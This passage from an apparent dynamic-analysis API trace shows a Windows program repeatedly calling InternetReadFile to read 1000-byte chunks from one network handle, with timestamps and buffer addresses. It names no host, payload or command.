lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978518*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.816] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978900*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978ce8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978ce8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39790d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39790d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39794b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39794b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39798a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39798a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3979c88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3979c88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.817] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a070*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a458*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a840, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a840*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397ac28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397ac28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b010, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b010*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b3f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b3f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b7e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b7e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.818] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397bbc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397bbc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397bfb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397bfb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397c398, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397c398*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397c780, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397c780*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397cb68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397cb68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397cf50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397cf50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397d338, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397d338*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.819] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397d720, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397d720*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397db08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397db08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397def0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397def0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397e2d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397e2d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397e6c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397e6c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.832] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397eaa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397eaa8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397ee90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397ee90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397f278, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397f278*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397f660, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397f660*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397fa48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397fa48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397fe30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397fe30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.833] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980218, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980218*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980600, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980600*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39809e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39809e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980dd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980dd0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39811b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39811b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39815a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39815a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.838] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3981988, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3981988*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3981d70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3981d70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982158, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982158*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982540, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982540*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982928, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982928*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982d10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982d10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39830f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39830f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.839] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39834e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39834e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.840] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39838c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39838c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.840] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3983cb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3983cb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.840] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984098, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984098*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.842] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984480, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984480*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.842] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984868, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984868*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.842] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984c50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984c50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985038, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985038*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985420, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985420*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985808, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985808*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985bf0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985bf0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.843] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985fd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985fd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39863c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39863c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39867a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39867a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.844] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3986b90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3986b90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3986f78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3986f78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987360, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987360*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987748, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987748*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987b30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987b30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987f18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987f18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988300, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988300*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39886e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39886e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988ad0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988ad0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.846] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988eb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988eb8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39892a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39892a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989688, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989688*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989a70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989a70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989e58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989e58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.847] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398a240, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398a240*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.848] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398a628, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398a628*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.848] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398aa10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398aa10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.848] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398adf8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398adf8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.848] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b1e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b1e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.848] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b5c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b5c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.848] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398b9b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398b9b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398bd98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398bd98*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c180, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c180*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c568, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c568*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398c950, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398c950*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398cd38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398cd38*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d120, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d120*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d508, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d508*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398d8f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398d8f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.850] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398dcd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398dcd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.851] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e0c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e0c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.851] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e4a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e4a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.851] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398e890, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398e890*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.872] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398ec78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398ec78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.872] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f060, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f060*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.872] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f448, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f448*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.873] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398f830, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398f830*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.873] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398fc18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398fc18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.873] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990000, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990000*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39903e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39903e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39907d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39907d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.874] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990bb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990bb8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3990fa0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3990fa0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991388, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991388*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991770, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991770*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991b58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991b58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3991f40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3991f40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992328, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992328*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.875] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992710, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992710*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992af8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992af8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3992ee0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3992ee0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39932c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39932c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39936b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39936b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3993a98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3993a98*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.876] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3993e80, dwNumberOfBytesToRead=0x3e8, 